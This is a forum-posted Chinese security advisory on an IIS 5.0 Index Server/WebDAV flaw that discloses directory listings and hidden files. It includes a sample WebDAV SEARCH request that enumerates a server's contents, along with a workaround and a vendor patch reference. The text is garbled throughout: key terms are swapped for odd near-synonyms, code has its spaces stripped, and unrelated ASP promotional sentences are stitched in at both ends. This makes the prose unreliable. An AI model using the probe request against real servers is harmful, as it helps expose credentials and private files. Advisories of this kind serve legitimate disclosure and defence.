|
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
asp可以轻松地实现对页面内容的动态控制,根据不同的浏览者,显示不同的页面内容。而浏览者一点觉察不出来,就像为他专门制作的页面一样。使用各种各样的组件,asp可以完成无比强大的功能。iis|索引|微软微软IIS5.0泄露索引目次的毛病
公布日期:2000-10-6
更新日期:2000-10-6
受影响的体系:MicrosoftIIS5.0
+MicrosoftWindowsNT2000
形貌:
--------------------------------------------------------------------------------
假如IIS5.0中的IndexServer被同意的话,远程用户便可能观察全部根目次布局和一切子目次,这是由于WebDAV的查找完成中存在一个缺点。埋没目次、包括文件(*.inc)或别的在一般的网站界面中一样平常不克不及存取的文档就会因为这个毛病而泄露。
乐成天时用这个毛病便可能找到那些大概包括敏感信息如用户名和暗码的特定文件。
默许情形下IIS5.0中的IndexServer是被克制的,只要设置了“Index”属性的目次才会遭到这个毛病的影响。
<*DavidLitchfield<dlitchfield@atstake.com>*>
测试程序:
--------------------------------------------------------------------------------
警告
以下程序(办法)大概带有打击性,仅供平安研讨与教授教养之用。利用者风险自信!
发送以下的哀求给服务器:
SEARCH/HTTP/1.1
Host:target
Content-Type:text/xml
Content-Length:133
<?xmlversion="1.0"?>
<g:searchrequestxmlns:g="DAV:">
<g:sql>
Select"DAV:displayname"fromscope()
</g:sql>
</g:searchrequest>
--------------------------------------------------------------------------------
倡议:
一时办理举措:
NSFOCUS倡议您利用微软供应的办理计划:
假如您没有利用IndexServer(好比您的网站中没有必要查找的内容),克制或卸载该服务。大概将包括敏感信息的目次的“Indexthisresource”的选项克制。
厂商补钉:
微软已公布一篇常识库文章具体形貌了这个成绩的办理办法,能够在以下的地位找到这篇文章:
http://www.microsoft.com/technet/support/kb.asp?ID=272079
中联绿盟翻译收拾,未经允许,不得转载
接待会见我们的站点http://www.nsfocus.com/
中联绿盟给您平安的保证
</p>减少客户内IT专业人才缺乏带来的影响。ASP的客户员工利用浏览器进入相关的应用软件,简单易用,无需专业技术支持。 |
|